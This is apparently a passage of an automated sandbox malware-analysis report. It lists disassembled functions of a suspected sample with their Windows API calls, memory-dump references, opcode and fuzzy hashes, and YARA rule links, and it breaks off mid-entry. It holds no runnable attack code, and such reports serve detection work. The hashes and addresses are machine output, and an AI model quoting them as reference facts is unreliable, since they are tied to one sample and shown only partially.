                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                                            • String ID: cdecl
                                                                                                            • API String ID: 4031866154-3896280584
                                                                                                            • Opcode ID: 3b46c19d868751a963e8e32c0d8ebb7db5b2bff5742c240f13ecfcb3a0abc755
                                                                                                            • Instruction ID: 7dfb364a0a210e4cef8e071fc742563b0e3d7332ee67f9b5adc19f18de3ce7b2
                                                                                                            • Opcode Fuzzy Hash: 3b46c19d868751a963e8e32c0d8ebb7db5b2bff5742c240f13ecfcb3a0abc755
                                                                                                            • Instruction Fuzzy Hash: 7311B43A201341EBCF15AF34D845DBA77A9FF85350B50502AF947CB264EB319811DB71
                                                                                                            Function 00DE7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00DE7D0B
                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00DE7D2A
                                                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00DE7D42
                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00DCB7AD,00000000), ref: 00DE7D6B
                                                                                                              • Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Long
                                                                                                            • String ID:
                                                                                                            • API String ID: 847901565-0
                                                                                                            • Opcode ID: 2974d6e1848dc2e43f35cfc6d424c02b383ca6c3e5486fa4c12da0a96dc63967
                                                                                                            • Instruction ID: 37953ba04fdfdcfd920328fb95b9980336a947a180cfc0cf19165153faef02f1
                                                                                                            • Opcode Fuzzy Hash: 2974d6e1848dc2e43f35cfc6d424c02b383ca6c3e5486fa4c12da0a96dc63967
                                                                                                            • Instruction Fuzzy Hash: DE119031614695AFCB50AF29CC44ABA3BA5EF45360B194724F835DB2F0D7309D52DB70
                                                                                                            Function 00DE5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00001060,?,00000004), ref: 00DE56BB
                                                                                                            • _wcslen.LIBCMT ref: 00DE56CD
                                                                                                            • _wcslen.LIBCMT ref: 00DE56D8
                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DE5816
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 455545452-0
                                                                                                            • Opcode ID: 94b51ef35128c6fdb31f7b1ee7ad9fdb403e19ebf70af10c337c119866d9cf3b
                                                                                                            • Instruction ID: 6be466367b2d33451a35d5e6607788561b127ac0fd5fa015498ffe5c57e9e323
                                                                                                            • Opcode Fuzzy Hash: 94b51ef35128c6fdb31f7b1ee7ad9fdb403e19ebf70af10c337c119866d9cf3b
                                                                                                            • Instruction Fuzzy Hash: F311063160068996DF20BF62ECC1AEE376CEF113A8F14402AF949D6085E770CA80CF70
                                                                                                            Function 00D81D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cf3144e142fa56e796694c49d744329063aa8a776ab7bc06491be7df4340992c
                                                                                                            • Instruction ID: 1bd06ca6b630f59aded9c9a1ee327aea03dc262d3dd8a0ce461a8b2af9b5ba79
                                                                                                            • Opcode Fuzzy Hash: cf3144e142fa56e796694c49d744329063aa8a776ab7bc06491be7df4340992c
                                                                                                            • Instruction Fuzzy Hash: 4A01ADF6209B1A7EF62136786CC0F27661DDF813B8B391725F521A12D2DB608C074370
                                                                                                            Function 00DB1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00DB1A47
                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DB1A59
                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DB1A6F
                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DB1A8A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 72228c6e04ca2a3ac35521545bb74286d7b82dcdcc19340a1a7e65dfd5ef4a29
                                                                                                            • Instruction ID: c0d8add0983a57e1693458f569262e371ce01a1076bd61077817366bbc5f82fd
                                                                                                            • Opcode Fuzzy Hash: 72228c6e04ca2a3ac35521545bb74286d7b82dcdcc19340a1a7e65dfd5ef4a29
                                                                                                            • Instruction Fuzzy Hash: AD11273A901219FFEB109BA4C985FEDBB78EB08750F200091EA05B7290D671AE51DBA4
                                                                                                            Function 00DBE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00DBE1FD
                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00DBE230
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00DBE246
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00DBE24D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2880819207-0
                                                                                                            • Opcode ID: 162c0de180a5b924e0ed6c9605fcec6f0a6a3a945acd853c47609c31a3fc489a
                                                                                                            • Instruction ID: d55d36454dfed2f7f895f61b1b0753b49a5ae87ab4c5c7fe2ebd059509e1a82d
                                                                                                            • Opcode Fuzzy Hash: 162c0de180a5b924e0ed6c9605fcec6f0a6a3a945acd853c47609c31a3fc489a
                                                                                                            • Instruction Fuzzy Hash: 52110472904354BFC711EBA89C49ADE7FADAB45320F144259F826E3391D6B0DE0587B0
                                                                                                            Function 00D7D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateThread.KERNEL32(00000000,?,00D7CFF9,00000000,00000004,00000000), ref: 00D7D218
                                                                                                            • GetLastError.KERNEL32 ref: 00D7D224
                                                                                                            • __dosmaperr.LIBCMT ref: 00D7D22B
                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 00D7D249
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                            • String ID:
                                                                                                            • API String ID: 173952441-0
                                                                                                            • Opcode ID: badace7a70533e4ce65759f11523e7130b171c722e39c1452bc2f668180d00ea
                                                                                                            • Instruction ID: cded1cf207de4bfea29924b86fec6afc2ffae9ee2f0a886db96d31d921216f21
                                                                                                            • Opcode Fuzzy Hash: badace7a70533e4ce65759f11523e7130b171c722e39c1452bc2f668180d00ea
                                                                                                            • Instruction Fuzzy Hash: A301D6364153047BC7216BA5DC05BAA7A7ADF81731F248219FD29D61D1EB70C902C6B0
                                                                                                            Function 00DE9EF3 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2
                                                                                                            • GetClientRect.USER32(?,?), ref: 00DE9F31
                                                                                                            • GetCursorPos.USER32(?), ref: 00DE9F3B
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00DE9F46
                                                                                                            • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00DE9F7A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 4127811313-0
                                                                                                            • Opcode ID: 515f59b05fe2700b0eaa2ecad6f9ed2f64feb994c25a02a0015b7d2dc66a4b83
                                                                                                            • Instruction ID: 6a26d566ba080926f2c822efa4a4b9f465592041b3539c6e37c8593b05fcb8ef
                                                                                                            • Opcode Fuzzy Hash: 515f59b05fe2700b0eaa2ecad6f9ed2f64feb994c25a02a0015b7d2dc66a4b83
                                                                                                            • Instruction Fuzzy Hash: CA11887290129AABCB10EF6AD8959EEB7B8FF45301F440451F801E7141C330FA82CBB1
                                                                                                            Function 00D5600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D5604C
                                                                                                            • GetStockObject.GDI32(00000011), ref: 00D56060
                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D5606A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3970641297-0
                                                                                                            • Opcode ID: 113ce1811895e440816f3deecd7c46cbcdffd75c915fb8d5210de566c8f72f2a
                                                                                                            • Instruction ID: 308934239f1533e104e62f2bdc2c93f101608eeb2fd17650df6616a3ad7458d5
                                                                                                            • Opcode Fuzzy Hash: 113ce1811895e440816f3deecd7c46cbcdffd75c915fb8d5210de566c8f72f2a
                                                                                                            • Instruction Fuzzy Hash: 7011AD72101648BFEF125FA8CC84EEABB69EF083A5F440205FE0496160CB32DC61DBB0
                                                                                                            Function 00D73B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 00D73B56
                                                                                                              • Part of subcall function 00D73AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00D73AD2
                                                                                                              • Part of subcall function 00D73AA3: ___AdjustPointer.LIBCMT ref: 00D73AED
                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00D73B6B
                                                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00D73B7C
                                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 00D73BA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                            • String ID:
                                                                                                            • API String ID: 737400349-0
                                                                                                            • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                            • Instruction ID: 4de8c1d2a57846c143f4a4f342c5cba1e11ee3c16d3b8ecfcc74f3d3211ae116
                                                                                                            • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                            • Instruction Fuzzy Hash: 6501E932100149BBDF125E95CC46EEB7B69EF58754F048018FE5C56121E732E961EBB1
                                                                                                            Function 00D83073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D513C6,00000000,00000000,?,00D8301A,00D513C6,00000000,00000000,00000000,?,00D8328B,00000006,FlsSetValue), ref: 00D830A5
                                                                                                            • GetLastError.KERNEL32(?,00D8301A,00D513C6,00000000,00000000,00000000,?,00D8328B,00000006,FlsSetValue,00DF2290,FlsSetValue,00000000,00000364,?,00D82E46), ref: 00D830B1
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D8301A,00D513C6,00000000,00000000,00000000,?,00D8328B,00000006,FlsSetValue,00DF2290,FlsSetValue,00000000), ref: 00D830BF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 3177248105-0
                                                                                                            • Opcode ID: 8200937a8ac89a68b792acf6f353c9e7c672d8dffc70c99a02b1a05491e9ed5f
                                                                                                            • Instruction ID: 937f7dd63dfcd5009a7d0476e0b1c82a9b076347c38b7a21e1efbb6c12192f9d
                                                                                                            • Opcode Fuzzy Hash: 8200937a8ac89a68b792acf6f353c9e7c672d8dffc70c99a02b1a05491e9ed5f
                                                                                                            • Instruction Fuzzy Hash: 4001F732311322ABCB316FB99C849677B98AF05FA1B140720F90DE7280C721DA02C7F0
                                                                                                            Function 00DB7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00DB747F
                                                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00DB7497
                                                                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00DB74AC
                                                                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00DB74CA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 1352324309-0
                                                                                                            • Opcode ID: cf4044aa29092dc1969620bc5c88dd70d4b3f0b9375c95ecdc0ca4ea8b58de9c
                                                                                                            • Instruction ID: 0e3b68d5809a47966f09ea3240852f0e9ef3234406871b4bdd86e3ebf4c0b34b
                                                                                                            • Opcode Fuzzy Hash: cf4044aa29092dc1969620bc5c88dd70d4b3f0b9375c95ecdc0ca4ea8b58de9c
                                                                                                            • Instruction Fuzzy Hash: 0211ADB1605314EBE7209F14DC48FD27BFCEB80B01F108569AA6BDA291D7B0E904DB70
                                                                                                            Function 00DBB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00DBACD3,?,00008000), ref: 00DBB0C4
                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DBACD3,?,00008000), ref: 00DBB0E9
                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00DBACD3,?,00008000), ref: 00DBB0F3
                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DBACD3,?,00008000), ref: 00DBB126
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 2875609808-0
                                                                                                            • Opcode ID: 31bef189abd30157a83c6ac8578bb11260846c29c432dee4ad7bf2030c524795
                                                                                                            • Instruction ID: cd6d5683261bd3335e42bc9651e27bf1277245bcbaf1623de98672ab0d9702bc
                                                                                                            • Opcode Fuzzy Hash: 31bef189abd30157a83c6ac8578bb11260846c29c432dee4ad7bf2030c524795
                                                                                                            • Instruction Fuzzy Hash: 74113C31D01728E7CF00AFA9D9986EEBB78FF1A761F104086D942B6241CBB095518B71
                                                                                                            Function 00DB2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00DB2DC5
                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DB2DD6
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00DB2DDD
                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00DB2DE4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2710830443-0
                                                                                                            • Opcode ID: 8bd89ab51b581b98d45589cc6e70ed802d8eb4d5bcd0d4e0e8601a93bbed8a19
                                                                                                            • Instruction ID: c1b7465361b7582feb4ec49114edfc521ff631cf8fb90d5e8d2dd9d0aa7caf62
                                                                                                            • Opcode Fuzzy Hash: 8bd89ab51b581b98d45589cc6e70ed802d8eb4d5bcd0d4e0e8601a93bbed8a19
                                                                                                            • Instruction Fuzzy Hash: 89E06D72211324BBDB202B639C4DEFB3E6CEB42BA1F441019B106D51909AA4C842C6F0
                                                                                                            Function 00DE8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D69639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D69693
                                                                                                              • Part of subcall function 00D69639: SelectObject.GDI32(?,00000000), ref: 00D696A2
                                                                                                              • Part of subcall function 00D69639: BeginPath.GDI32(?), ref: 00D696B9
                                                                                                              • Part of subcall function 00D69639: SelectObject.GDI32(?,00000000), ref: 00D696E2
                                                                                                            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00DE8887
                                                                                                            • LineTo.GDI32(?,?,?), ref: 00DE8894
                                                                                                            • EndPath.GDI32(?), ref: 00DE88A4
                                                                                                            • StrokePath.GDI32(?), ref: 00DE88B2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                            • String ID:
